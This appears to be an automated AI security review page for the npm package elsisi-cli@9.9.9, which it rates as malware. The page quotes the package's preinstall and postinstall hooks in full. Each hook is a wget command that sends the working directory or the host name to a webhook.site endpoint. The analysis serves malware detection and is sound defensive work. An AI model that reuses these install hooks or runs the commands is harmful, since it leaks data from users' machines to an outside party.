registry  /  elsisi-cli  /  9.9.9

elsisi-cli@9.9.9

AI Security Review

scanned 4h ago · by lpm-firewall-ai

npm install triggers two lifecycle hooks that contact a third-party webhook. They transmit installation-environment metadata in URL query parameters.

Static reason
One or more suspicious static signals were detected.
Trigger
Installing elsisi-cli@9.9.9 with npm lifecycle scripts enabled.
Impact
Leaks the install path and host name to an external endpoint during installation.
Mechanism
preinstall/postinstall wget-based environment metadata exfiltration
Attack narrative
On installation, the preinstall hook invokes wget to send the current working directory to a webhook.site URL. The postinstall hook independently sends the machine hostname to that endpoint. These automatic external disclosures have no corresponding package functionality; the only declared runtime entrypoint, index.js, is missing.
Rationale
Source inspection confirms concrete, automatic install-time data exfiltration through lifecycle hooks. The package has no implementation supporting a legitimate purpose for these calls.
Evidence
package.json
Network endpoints2
webhook.site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/?user=$(pwd)webhook.site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/?user=$(hostname)

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json:7 preinstall sends current working directory to webhook.site via wget.
  • package.json:8 postinstall sends hostname to the same external webhook.
  • Both actions run automatically during npm installation without user invocation.
  • The package contains only package.json; declared index.js is absent.
Evidence against
    Behavioral surface
    SourceNo risky source behavior triggered.
    Supply chainNo supply-chain packaging signals triggered.
    ManifestNo manifest risk signals triggered.
    scanned 0 file(s), 0 B of source

    Source & flagged code

    3 flagged · loading source
    package.jsonView file
    scripts.preinstall = wget --quiet https://webhook.site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/?user=$(pwd)
    High
    Install Time Lifecycle Scripts

    Package defines install-time lifecycle scripts.

    package.jsonView on unpkg
    scripts.preinstall = wget --quiet https://webhook.site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/?user=$(pwd)
    Medium
    Ambiguous Install Lifecycle Script

    Install-time lifecycle script is not statically allowlisted and needs review.

    package.jsonView on unpkg
    scripts.postinstall = wget --quiet https://webhook.site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/?user=$(hostname)
    Medium
    Ambiguous Install Lifecycle Script

    Install-time lifecycle script is not statically allowlisted and needs review.

    package.jsonView on unpkg

    Findings

    1 High2 Medium1 Low
    HighInstall Time Lifecycle Scriptspackage.json
    MediumAmbiguous Install Lifecycle Scriptpackage.json
    MediumAmbiguous Install Lifecycle Scriptpackage.json
    LowScripts Present